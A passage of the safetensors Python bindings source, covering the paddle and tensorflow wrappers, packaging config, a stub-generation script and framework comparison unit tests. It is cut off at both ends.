paddle format. 104 | 105 | Args: 106 | filename (`str`, or `os.PathLike`)): 107 | The name of the file which contains the tensors 108 | device (`Union[Dict[str, any], str]`, *optional*, defaults to `cpu`): 109 | The device where the tensors need to be located after load. 110 | available options are all regular paddle device locations 111 | 112 | Returns: 113 | `Dict[str, paddle.Tensor]`: dictionary that contains name as key, value as `paddle.Tensor` 114 | 115 | Example: 116 | 117 | ```python 118 | from safetensors.paddle import load_file 119 | 120 | file_path = "./my_folder/bert.safetensors" 121 | loaded = load_file(file_path) 122 | ``` 123 | """ 124 | flat = numpy.load_file(filename) 125 | output = _np2paddle(flat, device) 126 | return output 127 | 128 | 129 | def _np2paddle(numpy_dict: Dict[str, np.ndarray], device: str = "cpu") -> Dict[str, paddle.Tensor]: 130 | for k, v in numpy_dict.items(): 131 | numpy_dict[k] = paddle.to_tensor(v, place=device) 132 | return numpy_dict 133 | 134 | 135 | def _paddle2np(paddle_dict: Dict[str, paddle.Tensor]) -> Dict[str, np.array]: 136 | for k, v in paddle_dict.items(): 137 | paddle_dict[k] = v.detach().cpu().numpy() 138 | return paddle_dict 139 | -------------------------------------------------------------------------------- /bindings/python/py_src/safetensors/py.typed: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/huggingface/safetensors/bca53e3e178b9e1279c8d32302cdbbdcd4ce4842/bindings/python/py_src/safetensors/py.typed -------------------------------------------------------------------------------- /bindings/python/py_src/safetensors/tensorflow.py: -------------------------------------------------------------------------------- 1 | import os 2 | from typing import Dict, Optional, Union 3 | 4 | import numpy as np 5 | import tensorflow as tf 6 | 7 | from safetensors import numpy, safe_open 8 | 9 | 10 | def save(tensors: Dict[str, tf.Tensor], metadata: Optional[Dict[str, str]] = None) -> bytes: 11 | """ 12 | Saves a dictionary of tensors into raw bytes in safetensors format. 13 | 14 | Args: 15 | tensors (`Dict[str, tf.Tensor]`): 16 | The incoming tensors. Tensors need to be contiguous and dense. 17 | metadata (`Dict[str, str]`, *optional*, defaults to `None`): 18 | Optional text only metadata you might want to save in your header. 19 | For instance it can be useful to specify more about the underlying 20 | tensors. This is purely informative and does not affect tensor loading. 21 | 22 | Returns: 23 | `bytes`: The raw bytes representing the format 24 | 25 | Example: 26 | 27 | ```python 28 | from safetensors.tensorflow import save 29 | import tensorflow as tf 30 | 31 | tensors = {"embedding": tf.zeros((512, 1024)), "attention": tf.zeros((256, 256))} 32 | byte_data = save(tensors) 33 | ``` 34 | """ 35 | np_tensors = _tf2np(tensors) 36 | return numpy.save(np_tensors, metadata=metadata) 37 | 38 | 39 | def save_file( 40 | tensors: Dict[str, tf.Tensor], 41 | filename: Union[str, os.PathLike], 42 | metadata: Optional[Dict[str, str]] = None, 43 | ) -> None: 44 | """ 45 | Saves a dictionary of tensors into raw bytes in safetensors format. 46 | 47 | Args: 48 | tensors (`Dict[str, tf.Tensor]`): 49 | The incoming tensors. Tensors need to be contiguous and dense. 50 | filename (`str`, or `os.PathLike`)): 51 | The filename we're saving into. 52 | metadata (`Dict[str, str]`, *optional*, defaults to `None`): 53 | Optional text only metadata you might want to save in your header. 54 | For instance it can be useful to specify more about the underlying 55 | tensors. This is purely informative and does not affect tensor loading. 56 | 57 | Returns: 58 | `None` 59 | 60 | Example: 61 | 62 | ```python 63 | from safetensors.tensorflow import save_file 64 | import tensorflow as tf 65 | 66 | tensors = {"embedding": tf.zeros((512, 1024)), "attention": tf.zeros((256, 256))} 67 | save_file(tensors, "model.safetensors") 68 | ``` 69 | """ 70 | np_tensors = _tf2np(tensors) 71 | return numpy.save_file(np_tensors, filename, metadata=metadata) 72 | 73 | 74 | def load(data: bytes) -> Dict[str, tf.Tensor]: 75 | """ 76 | Loads a safetensors file into tensorflow format from pure bytes. 77 | 78 | Args: 79 | data (`bytes`): 80 | The content of a safetensors file 81 | 82 | Returns: 83 | `Dict[str, tf.Tensor]`: dictionary that contains name as key, value as `tf.Tensor` on cpu 84 | 85 | Example: 86 | 87 | ```python 88 | from safetensors.tensorflow import load 89 | 90 | file_path = "./my_folder/bert.safetensors" 91 | with open(file_path, "rb") as f: 92 | data = f.read() 93 | 94 | loaded = load(data) 95 | ``` 96 | """ 97 | flat = numpy.load(data) 98 | return _np2tf(flat) 99 | 100 | 101 | def load_file(filename: Union[str, os.PathLike]) -> Dict[str, tf.Tensor]: 102 | """ 103 | Loads a safetensors file into tensorflow format. 104 | 105 | Args: 106 | filename (`str`, or `os.PathLike`)): 107 | The name of the file which contains the tensors 108 | 109 | Returns: 110 | `Dict[str, tf.Tensor]`: dictionary that contains name as key, value as `tf.Tensor` 111 | 112 | Example: 113 | 114 | ```python 115 | from safetensors.tensorflow import load_file 116 | 117 | file_path = "./my_folder/bert.safetensors" 118 | loaded = load_file(file_path) 119 | ``` 120 | """ 121 | result = {} 122 | with safe_open(filename, framework="tf") as f: 123 | for k in f.offset_keys(): 124 | result[k] = f.get_tensor(k) 125 | return result 126 | 127 | 128 | def _np2tf(numpy_dict: Dict[str, np.ndarray]) -> Dict[str, tf.Tensor]: 129 | for k, v in numpy_dict.items(): 130 | numpy_dict[k] = tf.convert_to_tensor(v) 131 | return numpy_dict 132 | 133 | 134 | def _tf2np(tf_dict: Dict[str, tf.Tensor]) -> Dict[str, np.array]: 135 | for k, v in tf_dict.items(): 136 | tf_dict[k] = v.numpy() 137 | return tf_dict 138 | -------------------------------------------------------------------------------- /bindings/python/pyproject.toml: -------------------------------------------------------------------------------- 1 | [project] 2 | name = 'safetensors' 3 | requires-python = '>=3.9' 4 | authors = [ 5 | {name = 'Nicolas Patry', email = 'patry.nicolas@protonmail.com'} 6 | ] 7 | classifiers = [ 8 | "Development Status :: 5 - Production/Stable", 9 | "Intended Audience :: Developers", 10 | "Intended Audience :: Education", 11 | "Intended Audience :: Science/Research", 12 | "License :: OSI Approved :: Apache Software License", 13 | "Operating System :: OS Independent", 14 | "Programming Language :: Python :: 3", 15 | "Programming Language :: Python :: 3.7", 16 | "Programming Language :: Python :: 3.8", 17 | "Programming Language :: Python :: 3.9", 18 | "Programming Language :: Python :: 3.10", 19 | "Topic :: Scientific/Engineering :: Artificial Intelligence", 20 | "Typing :: Typed", 21 | ] 22 | license = { file = "LICENSE" } 23 | dynamic = [ 24 | 'description', 25 | 'readme', 26 | 'version', 27 | ] 28 | 29 | [project.urls] 30 | Homepage = 'https://github.com/huggingface/safetensors' 31 | Source = 'https://github.com/huggingface/safetensors' 32 | 33 | [project.optional-dependencies] 34 | numpy = ["numpy>=1.21.6"] 35 | torch = [ 36 | "safetensors[numpy]", 37 | "torch>=1.10", 38 | ] 39 | tensorflow = [ 40 | "safetensors[numpy]", 41 | "tensorflow>=2.11.0", 42 | ] 43 | # pinning tf version 2.11.0 for doc-builder 44 | pinned-tf = [ 45 | "safetensors[numpy]", 46 | "tensorflow==2.18.0", 47 | ] 48 | jax = [ 49 | "safetensors[numpy]", 50 | "flax>=0.6.3", 51 | "jax>=0.3.25", 52 | "jaxlib>=0.3.25", 53 | ] 54 | mlx = [ 55 | "mlx>=0.0.9", 56 | ] 57 | paddlepaddle = [ 58 | "safetensors[numpy]", 59 | "paddlepaddle>=2.4.1", 60 | ] 61 | quality = [ 62 | "black==22.3", # after updating to black 2023, also update Python version in pyproject.toml to 3.7 63 | "click==8.0.4", 64 | "isort>=5.5.4", 65 | "flake8>=3.8.3", 66 | ] 67 | testing = [ 68 | "safetensors[numpy]", 69 | "h5py>=3.7.0", 70 | "huggingface_hub>=0.12.1", 71 | "setuptools_rust>=1.5.2", 72 | "pytest>=7.2.0", 73 | "pytest-benchmark>=4.0.0", 74 | # "python-afl>=0.7.3", 75 | "hypothesis>=6.70.2", 76 | ] 77 | all = [ 78 | "safetensors[torch]", 79 | "safetensors[numpy]", 80 | "safetensors[pinned-tf]", 81 | "safetensors[jax]", 82 | "safetensors[paddlepaddle]", 83 | "safetensors[quality]", 84 | "safetensors[testing]", 85 | ] 86 | dev = [ 87 | "safetensors[all]", 88 | ] 89 | 90 | 91 | [build-system] 92 | requires = ["maturin>=1.0,<2.0"] 93 | build-backend = "maturin" 94 | 95 | [tool.maturin] 96 | python-source = "py_src" 97 | module-name = "safetensors._safetensors_rust" 98 | bindings = 'pyo3' 99 | features = ["pyo3/extension-module"] 100 | 101 | [tool.black] 102 | line-length = 119 103 | target-version = ['py35'] 104 | 105 | [tool.setuptools.dynamic] 106 | readme = {file = ["README.rst"]} 107 | -------------------------------------------------------------------------------- /bindings/python/setup.cfg: -------------------------------------------------------------------------------- 1 | [isort] 2 | default_section = FIRSTPARTY 3 | ensure_newline_before_comments = True 4 | force_grid_wrap = 0 5 | include_trailing_comma = True 6 | known_first_party = transformers 7 | known_third_party = 8 | absl 9 | conllu 10 | datasets 11 | elasticsearch 12 | fairseq 13 | faiss-cpu 14 | fastprogress 15 | fire 16 | fugashi 17 | git 18 | h5py 19 | matplotlib 20 | nltk 21 | numpy 22 | packaging 23 | pandas 24 | PIL 25 | psutil 26 | pytest 27 | pytorch_lightning 28 | rouge_score 29 | sacrebleu 30 | seqeval 31 | sklearn 32 | streamlit 33 | tensorboardX 34 | tensorflow 35 | tensorflow_datasets 36 | timeout_decorator 37 | torch 38 | torchaudio 39 | torchtext 40 | torchvision 41 | torch_xla 42 | tqdm 43 | paddlepaddle 44 | 45 | line_length = 119 46 | lines_after_imports = 2 47 | multi_line_output = 3 48 | use_parentheses = True 49 | 50 | [flake8] 51 | ignore = E203, E501, E741, W503, W605 52 | max-line-length = 119 53 | 54 | [tool:pytest] 55 | doctest_optionflags=NUMBER NORMALIZE_WHITESPACE ELLIPSIS -------------------------------------------------------------------------------- /bindings/python/stub.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | import inspect 3 | import os 4 | 5 | import black 6 | 7 | 8 | INDENT = " " * 4 9 | GENERATED_COMMENT = "# Generated content DO NOT EDIT\n" 10 | 11 | 12 | def do_indent(text: str, indent: str): 13 | return text.replace("\n", f"\n{indent}") 14 | 15 | 16 | def function(obj, indent, text_signature=None): 17 | if text_signature is None: 18 | text_signature = obj.__text_signature__ 19 | string = "" 20 | string += f"{indent}def {obj.__name__}{text_signature}:\n" 21 | indent += INDENT 22 | string += f'{indent}"""\n' 23 | string += f"{indent}{do_indent(obj.__doc__, indent)}\n" 24 | string += f'{indent}"""\n' 25 | string += f"{indent}pass\n" 26 | string += "\n" 27 | string += "\n" 28 | return string 29 | 30 | 31 | def member_sort(member): 32 | if inspect.isclass(member): 33 | value = 10 + len(inspect.getmro(member)) 34 | else: 35 | value = 1 36 | return value 37 | 38 | 39 | def fn_predicate(obj): 40 | value = inspect.ismethoddescriptor(obj) or inspect.isbuiltin(obj) 41 | if value: 42 | return ( 43 | obj.__doc__ 44 | and obj.__text_signature__ 45 | and (not obj.__name__.startswith("_") or obj.__name__ in {"__enter__", "__exit__"}) 46 | ) 47 | if inspect.isgetsetdescriptor(obj): 48 | return obj.__doc__ and not obj.__name__.startswith("_") 49 | return False 50 | 51 | 52 | def get_module_members(module): 53 | members = [ 54 | member 55 | for name, member in inspect.getmembers(module) 56 | if not name.startswith("_") and not inspect.ismodule(member) 57 | ] 58 | members.sort(key=member_sort) 59 | return members 60 | 61 | 62 | def pyi_file(obj, indent=""): 63 | string = "" 64 | if inspect.ismodule(obj): 65 | string += GENERATED_COMMENT 66 | members = get_module_members(obj) 67 | for member in members: 68 | string += pyi_file(member, indent) 69 | 70 | elif inspect.isclass(obj): 71 | indent += INDENT 72 | mro = inspect.getmro(obj) 73 | if len(mro) > 2: 74 | inherit = f"({mro[1].__name__})" 75 | else: 76 | inherit = "" 77 | string += f"class {obj.__name__}{inherit}:\n" 78 | 79 | body = "" 80 | if obj.__doc__: 81 | body += f'{indent}"""\n{indent}{do_indent(obj.__doc__, indent)}\n{indent}"""\n' 82 | 83 | fns = inspect.getmembers(obj, fn_predicate) 84 | 85 | # Init 86 | if obj.__text_signature__: 87 | signature = obj.__text_signature__.replace("(", "(self, ") 88 | body += f"{indent}def __init__{signature}:\n" 89 | body += f"{indent+INDENT}pass\n" 90 | body += "\n" 91 | 92 | for name, fn in fns: 93 | body += pyi_file(fn, indent=indent) 94 | 95 | if not body: 96 | body += f"{indent}pass\n" 97 | 98 | string += body 99 | string += "\n\n" 100 | 101 | elif inspect.isbuiltin(obj): 102 | string += f"{indent}@staticmethod\n" 103 | string += function(obj, indent) 104 | 105 | elif inspect.ismethoddescriptor(obj): 106 | string += function(obj, indent) 107 | 108 | elif inspect.isgetsetdescriptor(obj): 109 | # TODO it would be interesing to add the setter maybe ? 110 | string += f"{indent}@property\n" 111 | string += function(obj, indent, text_signature="(self)") 112 | else: 113 | raise Exception(f"Object {obj} is not supported") 114 | return string 115 | 116 | 117 | def py_file(module, origin): 118 | members = get_module_members(module) 119 | 120 | string = GENERATED_COMMENT 121 | string += f"from .. import {origin}\n" 122 | string += "\n" 123 | for member in members: 124 | name = member.__name__ 125 | string += f"{name} = {origin}.{name}\n" 126 | return string 127 | 128 | 129 | def do_black(content, is_pyi): 130 | mode = black.Mode( 131 | target_versions={black.TargetVersion.PY35}, 132 | line_length=119, 133 | is_pyi=is_pyi, 134 | string_normalization=True, 135 | experimental_string_processing=False, 136 | ) 137 | try: 138 | content = content.replace("$self", "self") 139 | return black.format_file_contents(content, fast=True, mode=mode) 140 | except black.NothingChanged: 141 | return content 142 | 143 | 144 | def write(module, directory, origin, check=False): 145 | submodules = [(name, member) for name, member in inspect.getmembers(module) if inspect.ismodule(member)] 146 | 147 | filename = os.path.join(directory, "__init__.pyi") 148 | pyi_content = pyi_file(module) 149 | pyi_content = do_black(pyi_content, is_pyi=True) 150 | os.makedirs(directory, exist_ok=True) 151 | if check: 152 | with open(filename, "r") as f: 153 | data = f.read() 154 | assert data == pyi_content, f"The content of {filename} seems outdated, please run `python stub.py`" 155 | else: 156 | with open(filename, "w") as f: 157 | f.write(pyi_content) 158 | 159 | filename = os.path.join(directory, "__init__.py") 160 | py_content = py_file(module, origin) 161 | py_content = do_black(py_content, is_pyi=False) 162 | os.makedirs(directory, exist_ok=True) 163 | 164 | is_auto = False 165 | if not os.path.exists(filename): 166 | is_auto = True 167 | else: 168 | with open(filename, "r") as f: 169 | line = f.readline() 170 | if line == GENERATED_COMMENT: 171 | is_auto = True 172 | 173 | if is_auto: 174 | if check: 175 | with open(filename, "r") as f: 176 | data = f.read() 177 | assert data == py_content, f"The content of {filename} seems outdated, please run `python stub.py`" 178 | else: 179 | with open(filename, "w") as f: 180 | f.write(py_content) 181 | 182 | for name, submodule in submodules: 183 | write(submodule, os.path.join(directory, name), f"{name}", check=check) 184 | 185 | 186 | if __name__ == "__main__": 187 | parser = argparse.ArgumentParser() 188 | parser.add_argument("--check", action="store_true") 189 | 190 | args = parser.parse_args() 191 | import safetensors 192 | 193 | write( 194 | safetensors._safetensors_rust, 195 | "py_src/safetensors/", 196 | "safetensors", 197 | check=args.check, 198 | ) 199 | -------------------------------------------------------------------------------- /bindings/python/tests/data/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/huggingface/safetensors/bca53e3e178b9e1279c8d32302cdbbdcd4ce4842/bindings/python/tests/data/__init__.py -------------------------------------------------------------------------------- /bindings/python/tests/test_flax_comparison.py: -------------------------------------------------------------------------------- 1 | import platform 2 | import unittest 3 | import sys 4 | 5 | 6 | if platform.system() != "Windows": 7 | # This platform is not supported, we don't want to crash on import 8 | # This test will be skipped anyway. 9 | import jax.numpy as jnp 10 | from jax import random 11 | from flax.serialization import msgpack_restore, msgpack_serialize 12 | from safetensors import safe_open 13 | from safetensors.flax import load_file, save_file 14 | 15 | 16 | # Jax doesn't not exist on Windows 17 | @unittest.skipIf(platform.system() == "Windows", "Flax is not available on Windows") 18 | class LoadTestCase(unittest.TestCase): 19 | def setUp(self): 20 | key = random.key(0) 21 | data = { 22 | "test": random.normal(key, (1024, 1024), dtype=jnp.float32), 23 | "test2": random.normal(key, (1024, 1024), dtype=jnp.float16), 24 | "test3": random.normal(key, (1024, 1024), dtype=jnp.bfloat16), 25 | } 26 | self.flax_filename = "./tests/data/flax_load.msgpack" 27 | self.sf_filename = "./tests/data/flax_load.safetensors" 28 | 29 | serialized = msgpack_serialize(data) 30 | with open(self.flax_filename, "wb") as f: 31 | f.write(serialized) 32 | 33 | save_file(data, self.sf_filename) 34 | 35 | def test_zero_sized(self): 36 | data = { 37 | "test": jnp.zeros((2, 0), dtype=jnp.float32), 38 | } 39 | local = "./tests/data/out_safe_flat_mmap_small2.safetensors" 40 | save_file(data.copy(), local) 41 | reloaded = load_file(local) 42 | # Empty tensor != empty tensor on numpy, so comparing shapes 43 | # instead 44 | self.assertEqual(data["test"].shape, reloaded["test"].shape) 45 | 46 | def test_deserialization_safe(self): 47 | weights = load_file(self.sf_filename) 48 | 49 | with open(self.flax_filename, "rb") as f: 50 | data = f.read() 51 | flax_weights = msgpack_restore(data) 52 | 53 | for k, v in weights.items(): 54 | tv = flax_weights[k] 55 | self.assertTrue(jnp.allclose(v, tv)) 56 | 57 | def test_deserialization_safe_open(self): 58 | weights = {} 59 | with safe_open(self.sf_filename, framework="flax") as f: 60 | for k in f.keys(): 61 | weights[k] = f.get_tensor(k) 62 | 63 | with open(self.flax_filename, "rb") as f: 64 | data = f.read() 65 | flax_weights = msgpack_restore(data) 66 | 67 | for k, v in weights.items(): 68 | tv = flax_weights[k] 69 | self.assertTrue(jnp.allclose(v, tv)) 70 | 71 | def test_loading_without_ml_dtype(self): 72 | # This does not work as we cannot unload 73 | # modules, copy this into its own file to test. 74 | # https://github.com/huggingface/safetensors/issues/598 75 | sys.modules.pop("ml_dtypes", None) 76 | with safe_open(self.sf_filename, framework="flax") as f: 77 | f.get_tensor("test3") 78 | -------------------------------------------------------------------------------- /bindings/python/tests/test_mlx_comparison.py: -------------------------------------------------------------------------------- 1 | import platform 2 | import unittest 3 | 4 | 5 | HAS_MLX = False 6 | if platform.system() == "Darwin": 7 | # This platform is not supported, we don't want to crash on import 8 | # This test will be skipped anyway. 9 | try: 10 | import mlx.core as mx 11 | 12 | HAS_MLX = True 13 | except ImportError: 14 | pass 15 | if HAS_MLX: 16 | from safetensors import safe_open 17 | from safetensors.mlx import load_file, save_file 18 | 19 | 20 | # MLX only exists on Mac 21 | @unittest.skipIf(platform.system() != "Darwin", "Mlx is not available on non Mac") 22 | @unittest.skipIf(not HAS_MLX, "Mlx is not available.") 23 | class LoadTestCase(unittest.TestCase): 24 | def setUp(self): 25 | data = { 26 | "test": mx.randn((1024, 1024), dtype=mx.float32), 27 | "test2": mx.randn((1024, 1024), dtype=mx.float32), 28 | "test3": mx.randn((1024, 1024), dtype=mx.float32), 29 | # This doesn't work because bfloat16 is not implemented 30 | # with similar workarounds as jax/tensorflow. 31 | # https://github.com/ml-explore/mlx/issues/1296 32 | # "test4": mx.randn((1024, 1024), dtype=mx.bfloat16), 33 | } 34 | self.mlx_filename = "./tests/data/mlx_load.npz" 35 | self.sf_filename = "./tests/data/mlx_load.safetensors" 36 | 37 | mx.savez(self.mlx_filename, **data) 38 | save_file(data, self.sf_filename) 39 | 40 | def test_zero_sized(self): 41 | data = { 42 | "test": mx.zeros((2, 0), dtype=mx.float32), 43 | } 44 | local = "./tests/data/out_safe_flat_mmap_small2.safetensors" 45 | save_file(data.copy(), local) 46 | reloaded = load_file(local) 47 | # Empty tensor != empty tensor on numpy, so comparing shapes 48 | # instead 49 | self.assertEqual(data["test"].shape, reloaded["test"].shape) 50 | 51 | def test_deserialization_safe(self): 52 | weights = load_file(self.sf_filename) 53 | 54 | mlx_weights = mx.load(self.mlx_filename) 55 | 56 | for k, v in weights.items(): 57 | tv = mlx_weights[k] 58 | self.assertTrue(mx.allclose(v, tv)) 59 | 60 | def test_deserialization_safe_open(self): 61 | weights = {} 62 | with safe_open(self.sf_filename, framework="mlx") as f: 63 | for k in f.keys(): 64 | weights[k] = f.get_tensor(k) 65 | 66 | mlx_weights = mx.load(self.mlx_filename) 67 | 68 | for k, v in weights.items(): 69 | tv = mlx_weights[k] 70 | self.assertTrue(mx.allclose(v, tv)) 71 | -------------------------------------------------------------------------------- /bindings/python/tests/test_paddle_comparison.py: -------------------------------------------------------------------------------- 1 | import unittest 2 | 3 | import numpy as np 4 | 5 | 6 | try: 7 | import paddle 8 | from safetensors.paddle import load_file, save_file 9 | 10 | HAS_PADDLE = True 11 | except ImportError: 12 | HAS_PADDLE = False 13 | 14 | 15 | @unittest.skipIf(not HAS_PADDLE, "Paddle is not available") 16 | class SafeTestCase(unittest.TestCase): 17 | def setUp(self): 18 | data = { 19 | "test": paddle.zeros((1024, 1024), dtype=paddle.float32), 20 | "test2": paddle.zeros((1024, 1024), dtype=paddle.float32), 21 | "test3": paddle.zeros((1024, 1024), dtype=paddle.float32), 22 | } 23 | self.paddle_filename = "./tests/data/paddle_load.pdparams" 24 | self.sf_filename = "./tests/data/paddle_load.safetensors" 25 | 26 | paddle.save(data, self.paddle_filename) 27 | save_file(data, self.sf_filename) 28 | 29 | @unittest.expectedFailure 30 | def test_zero_sized(self): 31 | # This fails because paddle wants initialized tensor before 32 | # sending to numpy 33 | data = { 34 | "test": paddle.zeros((2, 0), dtype=paddle.float32), 35 | } 36 | local = "./tests/data/out_safe_paddle_mmap_small2.safetensors" 37 | save_file(data, local) 38 | reloaded = load_file(local) 39 | self.assertTrue(paddle.equal(data["test"], reloaded["test"])) 40 | 41 | def test_deserialization_safe(self): 42 | weights = load_file(self.sf_filename) 43 | 44 | paddle_weights = paddle.load(self.paddle_filename) 45 | for k, v in weights.items(): 46 | tv = paddle_weights[k] 47 | self.assertTrue(np.allclose(v, tv)) 48 | -------------------------------------------------------------------------------- /bindings/python/tests/test_pt_model.py: -------------------------------------------------------------------------------- 1 | import copy 2 | import unittest 3 | 4 | import torch 5 | 6 | from safetensors import safe_open 7 | from safetensors.torch import ( 8 | _end_ptr, 9 | _find_shared_tensors, 10 | _is_complete, 11 | _remove_duplicate_names, 12 | load_model, 13 | save_file, 14 | save_model, 15 | ) 16 | 17 | 18 | class OnesModel(torch.nn.Module): 19 | def __init__(self): 20 | super().__init__() 21 | self.a = torch.nn.Linear(4, 4) 22 | self.a.weight = torch.nn.Parameter(torch.ones((4, 4))) 23 | self.a.bias = torch.nn.Parameter(torch.ones((4,))) 24 | self.b = self.a 25 | 26 | 27 | class Model(torch.nn.Module): 28 | def __init__(self): 29 | super().__init__() 30 | self.a = torch.nn.Linear(100, 100) 31 | self.b = self.a 32 | 33 | 34 | class NonContiguousModel(torch.nn.Module): 35 | def __init__(self): 36 | super().__init__() 37 | self.a = torch.nn.Linear(100, 100) 38 | A = torch.zeros((100, 100)) 39 | A = A.transpose(0, 1) 40 | self.a.weight = torch.nn.Parameter(A) 41 | 42 | 43 | class CopyModel(torch.nn.Module): 44 | def __init__(self): 45 | super().__init__() 46 | self.a = torch.nn.Linear(100, 100) 47 | self.b = copy.deepcopy(self.a) 48 | 49 | 50 | class NoSharedModel(torch.nn.Module): 51 | def __init__(self): 52 | super().__init__() 53 | self.a = torch.nn.Linear(100, 100) 54 | self.b = torch.nn.Linear(100, 100) 55 | 56 | 57 | class TorchModelTestCase(unittest.TestCase): 58 | def test_is_complete(self): 59 | A = torch.zeros((3, 3)) 60 | self.assertTrue(_is_complete(A)) 61 | 62 | B = A[:1, :] 63 | self.assertFalse(_is_complete(B)) 64 | 65 | # Covers the whole storage but with holes 66 | C = A[::2, :] 67 | self.assertFalse(_is_complete(C)) 68 | 69 | D = torch.zeros((2, 2), device=torch.device("meta")) 70 | self.assertTrue(_is_complete(D)) 71 | 72 | def test_find_shared_tensors(self): 73 | A = torch.zeros((3, 3)) 74 | B = A[:1, :] 75 | 76 | self.assertEqual(_find_shared_tensors({"A": A, "B": B}), [{"A", "B"}]) 77 | self.assertEqual(_find_shared_tensors({"A": A}), [{"A"}]) 78 | self.assertEqual(_find_shared_tensors({"B": B}), [{"B"}]) 79 | 80 | C = torch.zeros((2, 2), device=torch.device("meta")) 81 | D = C[:1] 82 | # Meta device is not shared 83 | self.assertEqual(_find_shared_tensors({"C": C, "D": D}), []) 84 | self.assertEqual(_find_shared_tensors({"C": C}), []) 85 | self.assertEqual(_find_shared_tensors({"D": D}), []) 86 | 87 | def test_find_shared_non_shared_tensors(self): 88 | A = torch.zeros((4,)) 89 | B = A[:2] 90 | C = A[2:] 91 | # Shared storage but do not overlap 92 | self.assertEqual(_find_shared_tensors({"B": B, "C": C}), [{"B"}, {"C"}]) 93 | 94 | B = A[:2] 95 | C = A[1:] 96 | # Shared storage but *do* overlap 97 | self.assertEqual(_find_shared_tensors({"B": B, "C": C}), [{"B", "C"}]) 98 | 99 | B = A[:2] 100 | C = A[2:] 101 | D = A[:1] 102 | # Shared storage but *do* overlap 103 | self.assertEqual(_find_shared_tensors({"B": B, "C": C, "D": D}), [{"B", "D"}, {"C"}]) 104 | 105 | def test_end_ptr(self): 106 | A = torch.zeros((4,)) 107 | start = A.data_ptr() 108 | end = _end_ptr(A) 109 | self.assertEqual(end - start, 16) 110 | B = torch.zeros((16,)) 111 | A = B[::4] 112 | start = A.data_ptr() 113 | end = _end_ptr(A) 114 | # Jump 3 times 16 byes (the stride of B) 115 | # Then add the size of the datapoint 4 bytes 116 | self.assertEqual(end - start, 16 * 3 + 4) 117 | 118 | # FLOAT16 119 | A = torch.zeros((4,), dtype=torch.float16) 120 | start = A.data_ptr() 121 | end = _end_ptr(A) 122 | self.assertEqual(end - start, 8) 123 | B = torch.zeros((16,), dtype=torch.float16) 124 | A = B[::4] 125 | start = A.data_ptr() 126 | end = _end_ptr(A) 127 | # Jump 3 times 8 bytes (the stride of B) 128 | # Then add the size of the datapoint 4 bytes 129 | self.assertEqual(end - start, 8 * 3 + 2) 130 | 131 | def test_remove_duplicate_names(self): 132 | A = torch.zeros((3, 3)) 133 | B = A[:1, :] 134 | 135 | self.assertEqual(_remove_duplicate_names({"A": A, "B": B}), {"A": ["B"]}) 136 | self.assertEqual(_remove_duplicate_names({"A": A, "B": B, "C": A}), {"A": ["B", "C"]}) 137 | with self.assertRaises(RuntimeError): 138 | self.assertEqual(_remove_duplicate_names({"B": B}), []) 139 | 140 | def test_failure(self): 141 | model = Model() 142 | with self.assertRaises(RuntimeError): 143 | save_file(model.state_dict(), "tmp.safetensors") 144 | 145 | # def test_workaround_refuse(self): 146 | # model = Model() 147 | # A = torch.zeros((1000, 10)) 148 | # a = A[:100, :] 149 | # model.a.weight = torch.nn.Parameter(a) 150 | # with self.assertRaises(RuntimeError) as ctx: 151 | # save_model(model, "tmp4.safetensors") 152 | # self.assertIn(".Refusing to save/load the model since you could be storing much more memory than needed.", str(ctx.exception)) 153 | 154 | def test_save(self): 155 | # Just testing the actual saved file to make sure we're ok on big endian 156 | model = OnesModel() 157 | save_model(model, "tmp_ones.safetensors") 158 | with safe_open("tmp_ones.safetensors", framework="pt") as f: 159 | self.assertEqual(f.metadata(), {"b.bias": "a.bias", "b.weight": "a.weight"}) 160 | 161 | # 192 hardcoded to skip the header, metadata order is random. 162 | self.assertEqual( 163 | open("tmp_ones.safetensors", "rb").read()[192:], 164 | b"""\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?""", 165 | ) 166 | 167 | model2 = OnesModel() 168 | load_model(model2, "tmp_ones.safetensors") 169 | 170 | state_dict = model.state_dict() 171 | for k, v in model2.state_dict().items(): 172 | torch.testing.assert_close(v, state_dict[k]) 173 | 174 | def test_workaround(self): 175 | model = Model() 176 | save_model(model, "tmp.safetensors") 177 | with safe_open("tmp.safetensors", framework="pt") as f: 178 | self.assertEqual(f.metadata(), {"b.bias": "a.bias", "b.weight": "a.weight"}) 179 | 180 | model2 = Model() 181 | load_model(model2, "tmp.safetensors") 182 | 183 | state_dict = model.state_dict() 184 | for k, v in model2.state_dict().items(): 185 | torch.testing.assert_close(v, state_dict[k]) 186 | 187 | def test_workaround_works_with_different_on_file_names(self): 188 | model = Model() 189 | state_dict = model.state_dict() 190 | state_dict.pop("a.weight") 191 | state_dict.pop("a.bias") 192 | save_file(state_dict, "tmp.safetensors") 193 | 194 | model2 = Model() 195 | load_model(model2, "tmp.safetensors") 196 | 197 | state_dict = model.state_dict() 198 | for k, v in model2.state_dict().items(): 199 | torch.testing.assert_close(v, state_dict[k]) 200 | 201 | def test_workaround_non_contiguous(self): 202 | model = NonContiguousModel() 203 | 204 | with self.assertRaises(ValueError) as ctx: 205 | save_model(model, "tmp_c.safetensors", force_contiguous=False) 206 | self.assertIn("use save_model(..., force_contiguous=True)", str(ctx.exception)) 207 | save_model(model, "tmp_c.safetensors", force_contiguous=True) 208 | 209 | model2 = NonContiguousModel() 210 | load_model(model2, "tmp_c.safetensors") 211 | 212 | state_dict = model.state_dict() 213 | for k, v in model2.state_dict().items(): 214 | torch.testing.assert_close(v, state_dict[k]) 215 | 216 | def test_workaround_copy(self): 217 | model = CopyModel() 218 | self.assertEqual( 219 | _find_shared_tensors(model.state_dict()), [{"a.weight"}, {"a.bias"}, {"b.weight"}, {"b.bias"}] 220 | ) 221 | save_model(model, "tmp.safetensors") 222 | 223 | model2 = CopyModel() 224 | load_model(model2, "tmp.safetensors") 225 | 226 | state_dict = model.state_dict() 227 | for k, v in model2.state_dict().items(): 228 | torch.testing.assert_close(v, state_dict[k]) 229 | 230 | def test_difference_with_torch(self): 231 | model = Model() 232 | torch.save(model.state_dict(), "tmp2.bin") 233 | 234 | model2 = NoSharedModel() 